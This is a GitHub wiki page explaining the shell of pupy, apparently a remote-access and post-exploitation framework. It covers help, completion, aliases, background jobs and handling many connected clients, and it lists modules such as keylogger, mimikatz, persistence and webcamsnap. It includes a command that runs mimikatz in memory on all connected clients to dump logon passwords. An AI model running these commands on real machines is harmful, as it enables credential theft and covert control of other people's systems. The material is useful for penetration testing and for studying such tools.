Using pupy shell

Chris Lenk edited this page Jul 26, 2018 · 7 revisions

The shell

Find commands and modules help

First of all it is important to know that nearly all commands in pupy have a help builtin. So if at any moment you are wondering what a command does you can type your command followed by -h or --help

sessions -h
jobs -h
run -h

This is even true for modules ! For example if you want to know how to use the pyexec module type :

>> run pyexec -h
usage: pyexec [-h] [--file <path>] [-c <code string>]

execute python code on a remote system 

optional arguments:
-h, --help            show this help message and exit
--file <path>         execute code from .py file
-c <code string>, --code <code string>
                      execute python oneliner code. ex : 'import
                      platform;print platform.uname()'

Use the completion !

Nearly all commands and modules in pupy have custom auto-completion. So if you are wondering what you need to type just press TAB

>> run 
getsystem           load_package        msgbox              ps                  shell_exec          
download            interactive_shell   memory_exec         persistence         pyexec              shellcode_exec      
exit                keylogger           migrate             port_scan           pyshell             socks5proxy         
get_info            linux_pers          mimikatz            portfwd             screenshot          upload              
getprivs            linux_stealth       mouselogger         process_kill        search              webcamsnap          
>> run load_package 
_sqlite3           linux_stealth      psutil             pupyimporter       pyshell            sqlite3            
interactive_shell  netcreds           ptyshell           pupymemexec        pywintypes27.dll   vidcap             
linux_pers         portscan           pupwinutils        pupyutils          scapy   
>> run pyexec -
--code   --file   --help   -c       -h       
>> run pyexec --file /
/bin/         /etc/         /lib/         /libx32/      /media/       /proc/        /sbin/        /sys/         /var/         
/boot/        /home/        /lib32/       /live-build/  /mnt/         /root/        /share/       /tmp/         /vmlinuz      
/dev/         /initrd.img   /lib64/       /lost+found/  /opt/         /run/         /srv/         /usr/         

Escape your arguments

Every command in pupy shell uses a unix-like escaping syntax. If you need a space in one of your arguments you need to put your argument between quotes.

>> run shell_exec 'tasklist /V'

If you send a Windows path, you need to double the backquotes or put everything between quotes.

>> run download 'C:\Windows\System32\cmd.exe'


>> run download C:\\Windows\\System32\\cmd.exe

Create Aliases

Modules aliases can be defined in the pupy.conf file. If you define the following alias :


running the command "shell" will be equivalent as running "run interactive_shell".

As an example, defining the following alias will add a command to kill the pupy client's process with signal 9:

killme = pyexec -c 'import os;os.kill(os.getpid(),9)'


Jobs are commands running in the background. Some modules like socks5proxy or portfwd automatically start as jobs, but all modules can be run as jobs when used with the --bg argument.

>> run --bg shell_exec 'tasklist /V'
[%] job < shell_exec ['tasklist /V'] > started in background !

The --bg switch is typically used when you want to execute a long command/module and want the result later while having the shell still functioning.
The jobs output can be retrieved at any moment by using the jobs -p command. From the "jobs" command you can also list jobs status and kill jobs.

>> jobs 
usage: jobs [-h] [-k <job_id>] [-l] [-p <job_id>]

list or kill jobs

optional arguments:
-h, --help            show this help message and exit
-k <job_id>, --kill <job_id>
print the job current output before killing it
-l, --list            list jobs
-p <job_id>, --print-output <job_id>
						print a job output

Regular jobs can be set in Linux/Unix environments by running your script inside the Screen utility. You can then setup cronjobs to run the below command at whatever intervals you require, this essentially pastes the input after the word 'stuff' into the screen session. Replace 1674 with the ID of your screen session, the echo command is the Enter key being pressed.

screen -S 1674 -X stuff 'this is an example command'$(echo -ne '\015')

Handle multiple clients connected

By default pupy launch every module you run on all connected clients. This allows for example to run mimikatz on all connected clients and dump passwords everywhere in one command

run memory_exec /usr/share/mimikatz/Win32/mimikatz.exe privilege::debug sekurlsa::logonPasswords exit

To interact with one client, use the "sessions -i" command

>> sessions -i 1
``` to interact with the session 1
 sessions -i 'platform:Windows release:7'
``` to interact with all windows 7 only
You can find all the available filtering parameters using the get_info module
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Press h to open a hovercard with more details.